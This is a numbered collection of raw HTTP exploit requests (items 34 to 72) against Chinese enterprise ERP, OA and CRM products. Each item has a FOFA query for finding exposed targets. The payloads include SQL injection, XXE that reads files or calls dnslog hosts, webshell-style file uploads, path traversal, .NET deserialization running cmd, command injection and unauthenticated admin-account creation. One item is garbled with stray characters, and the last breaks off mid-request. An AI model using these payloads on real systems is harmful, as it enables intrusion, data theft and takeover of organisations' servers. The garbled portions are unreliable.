GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. 用友NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. 用友NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. 用友NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. 用友NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. 用友U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. 用友U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. 用友U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. 用友U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. 用友GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

% K& p0 n: U2 w/ ~9 v) T" J
" J$ d- Q/ f5 R5 }43. 用友GRP-U8 userInfoWeb SQL注入致RCE: p* M+ v9 B6 b. o
FOFA:app="用友-GRP-U8"' T& j( s3 E9 v, t8 W  x' Z6 P$ V
POST /services/userInfoWeb HTTP/1.1. X/ Q8 S* s# \. l& J3 r
Host: your-ip6 j& ~9 N9 f' E+ x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36: p- q6 v0 y2 Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: u' T+ x- P* E2 S; Q( {
Accept-Encoding: gzip, deflate* m( }( ]7 ?1 c! C
Accept-Language: zh-CN,zh;q=0.9
, k: k4 y8 ~$ v' z% @, mConnection: close
" ~. o9 j/ k( v9 G0 w! JSOAPAction:
  c' X/ {" |7 F( |( g" j& uContent-Type: text/xml;charset=UTF-8
) n4 r( M- x' s* U" D2 y
! g" @9 h* R& o+ p/ }/ U, C: R<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">2 y" R9 d/ `; r! M" `
   <soapenv:Header/>
0 F0 O9 s' G8 R* j9 ^3 B   <soapenv:Body>
/ {. @" U/ W- @5 }( E# u      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
0 b: r, O4 c8 i: o         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>. C5 D' G5 l* o$ d
      </ser:getUserNameById>
2 W2 D7 d% |7 W9 O: V5 [& M1 \. }   </soapenv:Body>& Y" Q8 L& u7 F9 T( l2 [5 Q
</soapenv:Envelope>
+ A9 R* x+ o" e9 U7 ^0 M+ ^6 a, j: z; I, i8 ^% s& u8 g

44. 用友GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. 用友GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. 用友GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. 用友GRP A++Cloud 政府财务云 arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. 用友U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. 用友U8 CRM system uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. 云时空社会化商业ERP系统 validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. 泛微E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. 迪普 DPTech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. 畅捷通T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it executes a command that writes the given string into the given file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. 畅捷通T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the following endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: use the obtained Cookie to request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. 畅捷通T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. 畅捷通T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特脸爱云一脸通 smart management platform 1.0.55.0.0.1 permission bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, which confirms the vulnerability

67. 万户 ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the file written, the dir parameter sets the directory it is written to, and the fileType parameter sets the file type
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The written file is reachable at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户 ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户 ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远 OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

